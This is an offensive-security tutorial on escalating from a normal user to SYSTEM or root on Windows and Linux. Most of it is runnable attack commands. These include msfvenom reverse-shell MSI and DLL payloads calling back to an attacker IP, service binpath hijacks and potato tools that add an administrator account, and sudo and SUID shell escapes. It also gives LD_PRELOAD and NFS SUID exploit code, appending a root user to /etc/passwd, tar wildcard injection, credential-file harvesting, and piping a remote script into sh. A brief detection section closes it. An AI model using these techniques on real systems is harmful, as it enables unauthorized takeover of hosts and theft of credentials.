Privilege Escalation: From User to God
Initial access typically lands you as a regular user. Privilege escalation is about going from "I can run notepad" to "I own this machine." Without elevated privileges, you can't dump credentials, install persistent backdoors, or access protected data.
Most organizations have decent perimeter security. But once inside, privilege escalation vulnerabilities are everywhere. Misconfigurations, unpatched services, weak permissions—the path from user to SYSTEM/root is often embarrassingly short.
The Privilege Ladder
┌─────────────────────────────────────────────────────────────────────────────┐
│ PRIVILEGE ESCALATION PATH │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ WINDOWS: LINUX: │
│ │
│ ┌──────────────┐ ┌──────────────┐ │
│ │ SYSTEM │ ← God mode │ root │ ← God mode │
│ │ (NT AUTH) │ │ (UID 0) │ │
│ └──────┬───────┘ └──────┬───────┘ │
│ │ │ │
│ ┌──────▼───────┐ ┌──────▼───────┐ │
│ │Administrator │ ← High priv │ sudo │ ← Elevated │
│ │ (Local) │ │ users │ │
│ └──────┬───────┘ └──────┬───────┘ │
│ │ │ │
│ ┌──────▼───────┐ ┌──────▼───────┐ │
│ │ Domain Admin │ ← Network god │ Privileged │ ← Special access │
│ │ │ │ groups │ │
│ └──────┬───────┘ └──────┬───────┘ │
│ │ │ │
│ ┌──────▼───────┐ ┌──────▼───────┐ │
│ │ Standard User│ ← You start here │ Regular user │ ← You start here │
│ └──────────────┘ └──────────────┘ │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Windows Privilege Escalation
Windows has a complex privilege model with multiple paths to SYSTEM. The key is knowing where to look and what misconfigurations are common.
Unquoted Service Paths
When a service path contains spaces and isn't quoted, Windows tries multiple locations. If you can write to one of those locations, you get code execution as that service's user.
# Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
# Example vulnerable path:
# C:\Program Files\Vulnerable App\Service.exe
# Windows will try:
# C:\Program.exe
# C:\Program Files\Vulnerable.exe
# C:\Program Files\Vulnerable App\Service.exe
# Check write permissions on parent folders
icacls "C:\Program Files\Vulnerable App"
# If writable, drop malicious executable
copy payload.exe "C:\Program Files\Vulnerable.exe"
# Restart service (or wait for reboot)
sc stop VulnerableService
sc start VulnerableServiceWeak Service Permissions
Services running as SYSTEM with weak DACLs can be reconfigured to run your payload.
# Check service permissions with accesschk (Sysinternals)
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula
# Look for SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG
# If you can modify a service:
sc qc VulnerableService # Check current config
sc config VulnerableService binpath= "C:\temp\payload.exe"
sc stop VulnerableService
sc start VulnerableService
# Or add a user to administrators
sc config VulnerableService binpath= "net localgroup administrators attacker /add"AlwaysInstallElevated
If both registry keys are set, any user can install MSI packages as SYSTEM.
# Check if AlwaysInstallElevated is enabled
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If both return 0x1, you can install MSI as SYSTEM
# Create malicious MSI with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f msi -o evil.msi
# Install it
msiexec /quiet /qn /i evil.msiToken Impersonation (Potato Attacks)
If you have SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (common for service accounts), you can escalate to SYSTEM using various "Potato" techniques.
# Check current privileges
whoami /priv
# If SeImpersonatePrivilege is enabled:
# Use JuicyPotato, PrintSpoofer, or GodPotato
# PrintSpoofer (works on Windows 10/Server 2016+)
PrintSpoofer.exe -i -c "cmd /c whoami"
PrintSpoofer.exe -i -c "powershell -ep bypass"
# GodPotato (newer, works on more versions)
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "net user attacker Password123! /add"
GodPotato.exe -cmd "net localgroup administrators attacker /add"
# JuicyPotato (older systems)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c whoami" -t *Web servers (IIS), SQL Server, and many services run with SeImpersonatePrivilege by default. If you compromise one of these, you likely have a direct path to SYSTEM.
DLL Hijacking
When applications load DLLs without specifying full paths, Windows searches multiple locations. If you can write to a searched location, your malicious DLL gets loaded.
# DLL Search Order (simplified):
# 1. Directory of the executable
# 2. System32
# 3. System directory
# 4. Windows directory
# 5. Current directory
# 6. PATH directories
# Find DLL hijacking opportunities with Process Monitor
# Filter: Path contains ".dll" AND Result is "NAME NOT FOUND"
# Or use automated tools
# PowerUp: Find-DLLHijack
Import-Module .\PowerUp.ps1
Find-ProcessDLLHijack
# Create malicious DLL (must export expected functions)
# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f dll -o hijack.dllScheduled Tasks
# List scheduled tasks
schtasks /query /fo LIST /v
# Look for tasks that:
# - Run as SYSTEM or Administrator
# - Execute scripts/binaries you can modify
# - Have weak folder permissions
# Check permissions on task executables
icacls "C:\Scripts\backup.ps1"
# If writable, replace with malicious script
echo "net user attacker Password123! /add" > C:\Scripts\backup.ps1
echo "net localgroup administrators attacker /add" >> C:\Scripts\backup.ps1Stored Credentials
# Windows Credential Manager
cmdkey /list
# If credentials stored, try:
runas /savecred /user:administrator cmd.exe
# Search for credentials in files
findstr /si password *.txt *.ini *.config *.xml
dir /s *pass* == *cred* == *vnc* == *.config*
# Check unattend files (Windows deployment)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattended.xml
type C:\Windows\System32\sysprep\unattend.xml
# PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# IIS config
type C:\inetpub\wwwroot\web.config
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.configLinux Privilege Escalation
Linux privesc is often simpler than Windows—misconfigurations are more straightforward to exploit. The key vectors are SUID binaries, sudo misconfigurations, and kernel exploits.
SUID/SGID Binaries
SUID binaries run as the file owner (often root). If you can exploit them, instant root.
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# Find SGID binaries
find / -perm -2000 -type f 2>/dev/null
# Common exploitable SUID binaries (check GTFOBins):
# If find has SUID:
find . -exec /bin/sh -p \; -quit
# If vim has SUID:
vim -c ':!/bin/sh'
# If python has SUID:
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# If nmap has SUID (older versions):
nmap --interactive
!sh
# If cp has SUID:
cp /etc/passwd /tmp/passwd.bak
# Edit to add root user, then:
cp /tmp/passwd.bak /etc/passwdGTFOBins is the definitive resource for Unix binary exploitation. Always check if a SUID binary is listed there.
Sudo Misconfigurations
# Check sudo permissions
sudo -l
# Common exploitable sudo entries:
# If (ALL) NOPASSWD: /usr/bin/find
sudo find . -exec /bin/sh \; -quit
# If (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/sh'
# If (ALL) NOPASSWD: /usr/bin/less
sudo less /etc/passwd
!/bin/sh
# If (ALL) NOPASSWD: /usr/bin/awk
sudo awk 'BEGIN {system("/bin/sh")}'
# If (ALL) NOPASSWD: /usr/bin/env
sudo env /bin/sh
# If (ALL) NOPASSWD: /usr/bin/perl
sudo perl -e 'exec "/bin/sh";'
# If (ALL) NOPASSWD: /usr/bin/python
sudo python -c 'import pty; pty.spawn("/bin/sh")'
# If (ALL) NOPASSWD: /usr/bin/ruby
sudo ruby -e 'exec "/bin/sh"'
# LD_PRELOAD exploit (if env_keep+=LD_PRELOAD in sudoers)
# Create malicious shared library:
cat > /tmp/shell.c << 'EOF'
#include
#include
void _init() {
setuid(0);
setgid(0);
system("/bin/bash -p");
}
EOF
gcc -fPIC -shared -o /tmp/shell.so /tmp/shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so /usr/bin/find Writable /etc/passwd
# Check if writable
ls -la /etc/passwd
# If writable, add a root user:
# Generate password hash
openssl passwd -1 -salt xyz password123
# Output: $1$xyz$abcdefghijklmnop
# Add to /etc/passwd
echo 'hacker:$1$xyz$abcdefghijklmnop:0:0:root:/root:/bin/bash' >> /etc/passwd
# Switch to new user
su hacker
# Password: password123Cron Jobs
# View cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
cat /var/spool/cron/crontabs/*
# Look for:
# 1. Scripts you can modify
# 2. Relative paths (PATH hijacking)
# 3. Wildcards (wildcard injection)
# If cron runs: /opt/scripts/backup.sh
# And you can write to it:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /opt/scripts/backup.sh
# Wait for cron, then:
/tmp/bash -p
# Wildcard injection example:
# If cron runs: cd /home/user && tar czf backup.tar.gz *
# You can create files that become tar arguments:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > shell.sh
touch "/home/user/--checkpoint=1"
touch "/home/user/--checkpoint-action=exec=sh shell.sh"Kernel Exploits
# Check kernel version
uname -a
cat /etc/os-release
# Search for exploits
# searchsploit linux kernel [version]
# Common kernel exploits:
# DirtyCow (CVE-2016-5195) - Linux < 4.8.3
# DirtyPipe (CVE-2022-0847) - Linux 5.8 - 5.16.11
# DirtyPipe example (if vulnerable):
# Download and compile exploit
gcc -o dirtypipe dirtypipe.c
./dirtypipe /usr/bin/su
# Now /usr/bin/su is backdoored
# Automated enumeration:
# linux-exploit-suggester
./linux-exploit-suggester.sh
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | shCapabilities
# Find binaries with capabilities
getcap -r / 2>/dev/null
# Exploitable capabilities:
# cap_setuid - can change UID
# If python has cap_setuid:
python -c 'import os; os.setuid(0); os.system("/bin/bash")'
# cap_dac_override - bypass file permissions
# Can read any file
# cap_net_bind_service - bind to low ports
# Less useful for privesc
# cap_sys_admin - many powerful operations
# Can mount filesystems, etc.NFS Root Squashing Disabled
# Check NFS exports on target
cat /etc/exports
# Look for: no_root_squash
# If no_root_squash is set on an export:
# From your machine (as root):
mkdir /tmp/nfs
mount -t nfs target:/shared /tmp/nfs
cd /tmp/nfs
# Create SUID binary
cat > shell.c << 'EOF'
int main() {
setuid(0);
setgid(0);
system("/bin/bash");
}
EOF
gcc -o shell shell.c
chmod +s shell
# On target:
cd /shared
./shell
# Now root!Automated Enumeration
Manual enumeration is slow. These tools automate the search for privilege escalation vectors.
Windows
# WinPEAS - Comprehensive enumeration
# Download and run:
.\winPEASx64.exe
# PowerUp (PowerShell)
Import-Module .\PowerUp.ps1
Invoke-AllChecks
# Seatbelt - Targeted checks
.\Seatbelt.exe -group=all
# BeRoot
.\beRoot.exe
# PrivescCheck
Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheckLinux
# LinPEAS - Comprehensive enumeration
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
./LinEnum.sh
# linux-exploit-suggester
./linux-exploit-suggester.sh
# pspy - Monitor processes without root
./pspy64
# Linuxprivchecker
python linuxprivchecker.pyDetection Strategies
Attacker Indicators
- Service configuration changes
- New scheduled tasks as SYSTEM
- DLL files in unusual locations
- SUID bit changes on binaries
- Modifications to /etc/passwd
- Capability changes on binaries
- Potato exploit tools on disk
Defender Actions
- Monitor service binary path changes
- Alert on AlwaysInstallElevated registry
- Track SeImpersonate usage
- Audit sudo configuration changes
- Monitor /etc/passwd modifications
- Alert on kernel exploit signatures
- Use AppLocker/SRP for executables
Windows Event IDs
| Event ID | Source | Significance |
|---|---|---|
| 4697 | Security | Service installed on system |
| 7045 | System | New service installed |
| 4688 | Security | Process creation (with command line) |
| 4672 | Security | Special privileges assigned |
| 1102 | Security | Audit log cleared (covering tracks) |
Quick Reference
┌─────────────────────────────────────────────────────────────────┐
│ PRIVILEGE ESCALATION CHECKLIST │
├─────────────────────────────────────────────────────────────────┤
│ │
│ WINDOWS: │
│ □ whoami /priv - check SeImpersonate │
│ □ Unquoted service paths │
│ □ Weak service permissions │
│ □ AlwaysInstallElevated │
│ □ Stored credentials (cmdkey, files) │
│ □ DLL hijacking opportunities │
│ □ Scheduled tasks with weak perms │
│ □ Unpatched vulnerabilities │
│ │
│ LINUX: │
│ □ sudo -l - check sudo permissions │
│ □ SUID/SGID binaries │
│ □ Writable /etc/passwd │
│ □ Cron jobs with weak permissions │
│ □ Kernel version vs known exploits │
│ □ Capabilities on binaries │
│ □ NFS with no_root_squash │
│ □ Writable PATH directories │
│ │
└─────────────────────────────────────────────────────────────────┘
In real engagements, privilege escalation often takes minutes, not hours. The combination of legacy systems, rushed deployments, and complexity means misconfigurations are everywhere. A single unquoted service path or sudo misconfiguration is all it takes to go from unprivileged user to domain admin.